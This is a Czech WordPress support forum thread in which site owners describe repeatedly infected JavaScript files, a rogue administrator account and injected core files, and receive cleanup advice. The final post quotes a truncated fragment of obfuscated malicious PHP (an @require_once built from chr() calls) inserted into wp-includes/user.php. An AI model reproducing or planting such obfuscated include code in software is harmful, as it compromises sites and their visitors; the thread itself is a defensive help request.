WordPress – opakovaně napadené JS soubory

Úvodní stránka Fórum podpory WordPressu Problémy s WordPressem WordPress – opakovaně napadené JS soubory

Zvolené téma obsahuje celkem 14 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel  hlavka a poslední změna je stará 10 měsíců, 2 týdny.

Aktuálně je na stránce zobrazeno 15 příspěvků - 1. až 15. (z celkem 15)
  • Autor
    Příspěvky
  • #26697

    kuzmic11
    Participant

    Dobrý den,

    mohl bych poprosit o radu jak zabezpečit web na WP?

    Zhruba cca 3 týdny řešíme problémy, kdy se nám na webu zavirují kompletně všechny JS soubory. Nevím jak to přesně popsat, ale v každém JS souboru je na konci vždy řetězec začínající komentářem a pak x stovek dalších znaků.

    Šablonu používáme vlastní. Pluginů máme cca 8 a to opravdu jen ty pravidelně aktualizované a s vyšším hodnocením. Přes Wp-config.php máme zakázanou editaci zdrojových kódů přes Wp admina, změněné prefixy v tabulkách.

    Vyzkoušeli jsme i přesun webu k jinému poskytovateli, konkrétně tedy wedos, ale i přesto byl web znovu napaden.

    Museli jsme tedy opět provést čistou instalaci WP a pluginů + vyčištění JS souborů v šabloně.

    Popravdě vůbec nevím jak se tomu v budoucnu bránit aby se již nic podobného neopakovalo. Jelikož pokud takovému napadení dojde, Chrome a jiné prohlížeče tento web zablokují červeným varovným oknem s informací, že na webu je malware.

    Nevíte jak se této situaci efektivně bránit? Díky moc za každou radu, která se vám pomohla.

    #26705

    admin
    Keymaster
    Web

    Patrně jste se stal obětí poměrně známého útoku, který začal probíhat cca před měsícem a dochází právě k napadení všech JavaScriptových souborů. Stačilo pokud jste třeba někdy v minulosti používal nějaký problematický plugin či šablonu a robot si zapamatoval bezpečnostní díru (případně si připravil zadní vrátka) a až nyní začal hromadně útočit.

    Pokud už k napadení dojde, tak je třeba po vyčištění ještě provést následující:

    – Změnit hesla (databáze, FTP, administrátoři).
    – Zkontrolovat obsah databáze (zejména neznámé administrátory).
    – Zkontrolovat, zda se na web nepřihlašuje uživatel, který má napadený počítač.

    Obecně je to ale častý problém, nedávno jsem se setkal s webem, který jsem čistil a opět byl napaden, i když zatím netuším, jak se tam mohl útočník znovu dostat :-) Ale tam nešlo o JavaScriptové soubory…

    #26739

    kuzmic11
    Participant

    Děkuji za informace.

    Cca 5 dní byl teď klid, ale dnes ráno nám eset začal hlásit při příchodu na web: js/iframe.MO trojský kůň

    viz. příloha

    Když jsem procházel jednotlivé js soubory, které byly v minulosti napadeny, tak se vše tváří v pořádku a žádné řetězce tyto soubory neobsahují.

    Nesetkal jste se někdo s tímto problémem?

    Attachments:
    #26741

    admin
    Keymaster
    Web

    Příčina problému nemusí být přímo v JavaScriptových souborech umístěných na serveru, ale i někde jinde (načítané z jiného místa). Nebo že by prohlížeč načítal cachovanou podobu webu uloženou na počítači? Těžko říci, zkuste anonymní okno a prověřit web.

    #26750

    hlavka
    Participant

    Dobrý den,
    po hlášce o malware na našem webu jsem smazal a poté obnovil obsah přes FTP, změnil hesla FTP, Webu a databáze. I poté Sucuri hlásí prolomení sítě. Po přihlášení /wp-login.php mi hlásí: „Během připojování k databázovému serveru došlo k chybě“ Je to možné díky změně hesla db? Stačí poté, co se dostanu do wordpressu zkontrolovat soubory antivirovým pluginem?
    Děkuji za pomoc.

    #26751

    kuzmic11
    Participant

    Aktualizoval jsi upravené heslo do DB i v souboru wp-config.php?

    #26753

    admin
    Keymaster
    Web

    Přesně tak, jak píše @kuzmic11, změněné heslo se musí změnit i v konfiguračním souboru :-)

    @hlavka: Pokud jste zajistil výše uvedené kroky, tak by mělo stačit pročistit FTP. Pokud se ale nákaza stále objevuje, tak jste patrně stále neodhalil pravou příčinu (může to být třeba i plugin či šablona) a bude se to patrně opakovat i do budoucna…

    #26772

    hlavka
    Participant

    Změnil jsem heslo v wp-config.php, ale po mé snaze se přihlásit stále hlásí „Během připojování k databázovému serveru došlo k chybě.“

    – Potřeboval bych se zřejmě dostat do administrace WP, abych deaktivoval pluginy, ale jak to udělat?

    – Jak pročistit FTP? Antivirem pod Windows? (pracuji v OS Ubuntu).

    Děkuji.

    #26774

    admin
    Keymaster
    Web

    @hlavka: Patrně máte v souboru wp-config.php stále něco špatně, zkontrolujte, zda heslo opravdu funguje, zkuste se třeba přihlásit přímo do databáze přes PHPMyAdmin.

    Do administrace se dostanete až opravíte připojení k databázi. Pluginy lze deaktivovat i natvrdo ručně, a to přejmenováním adresáře wp-content/plugins. Ale pokud nefunguje připojení k databázi, tak to asi bude stejně k ničemu…

    FTP asi nejlépe pročistít pomocí nějakého pluginu, např. Wordfence Security.

    #26782

    hlavka
    Participant

    Opravil jsem heslo v wp-config.php, dostal se do wordpressu, deaktivoval všechny pluginy, nainstaloval a zapnul wordfence, změnil své heslo. Nyní po spuštění stránky nehlásí malware, ale vůbec nic, stránka je prázdná (asi budu muset aktivovat nějaký plugin – ale jaký?). Co jde spustit bez problémů je poddoména. Ve wordfence běží Live Traffic ad. Děkuji za předchozí cenné rady a pokud budete vědět co dál budu vám oběma vděčný.

    #26784

    hlavka
    Participant

    Dodávám, že zatímco Firefox nic nezobrazuje, G.Chrome stále hlásí stránku napadenou malware (možná stačí jen odhlásit pomocí formuláře?).

    #26790

    admin
    Keymaster
    Web

    Napadenou stránku by měl hlásit spíše nějaký antivir než prohlížeč? V prohlížeči Chrome asi pouze vidíte, co si o webu myslí vyhledávač Google? Můžete prosím přiložit screenshot? Pokud web identifikoval jako napadený, tak bude asi nějakou chvíli trvat než ho zase označí za čistý… Myslím, že tam bývá uveden i nějaký odkaz na opětovné posouzení webu? Web můžete zkontrolovat třeba zde, čímž zjistíte, zda je stále ještě nakažený.

    #26792

    hlavka
    Participant

    Dobrý den,
    přikládám screenshoty Google Chrome, ze Sucuri. Ve WP byly poničené české znaky, přeinstaloval jsem tedy WP.
    Kopie posledních řádků z Wordfence:
    [Feb 28 21:32:30] Analyzed 1800 files containing 29.92 MB of data so far
    [Feb 28 21:32:33] Analyzed 1900 files containing 33.16 MB of data so far
    [Feb 28 21:32:35] Scan can’t continue – stored data not found after a fork. Got type: boolean
    [Feb 28 23:56:35] Scheduled Wordfence scan starting at Sunday 28th of February 2016 11:56:35 PM
    [Feb 29 00:48:37] Scheduled Wordfence scan starting at Monday 29th of February 2016 12:48:37 AM

    #26795

    kuzmic11
    Participant

    Váš web musíte přidat do služby Google Webmaster tools. V navigaci zvolte: Bezpečnostní problémy. Zde uvidíte informaci od Googlu, že Váš byl napaden a proto se Vám zobrazuje v Chrome červené varovné okno z printscreenu. Je zde volba něco ve stylu: „Požádat o překontrolování“. Pokud máte web v pořádku většinou ještě ten den vám web odblokují.

    #27289

    hlavka
    Participant

    Dobrý den,
    malware jsem díky Vám odstranil, ale trápí mě neustálá změna pěti souborů, kterou mi hlásí Worldfence (všechny ostatní pluginy jsem deaktivoval):
    wp-includes/user.php, dtto taxonomy, post, load, class-wp – jsou do nich vloženy znaky, např. v user.php (část):
    @require_once(„“.chr(47).““.““.““.““.““.“w“.““.““.““.““.““.chr(101).““.““.chr(98).““.““.
    /*user.php                                                               */function wp_authenticate_cookie($user, $username, $password) {

    Dále se mi uhnizďuje nevítaný uživatel s administrátorskými právy:
    wpupdatestream s adresou support@wpwhitesecurity.com a Worldfence hlásí:
    Uživatel admin s uživatelským jménem wpupdatestream byl vytvořen mimo WordPress.
    Děkuji

Aktuálně je na stránce zobrazeno 15 příspěvků - 1. až 15. (z celkem 15)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.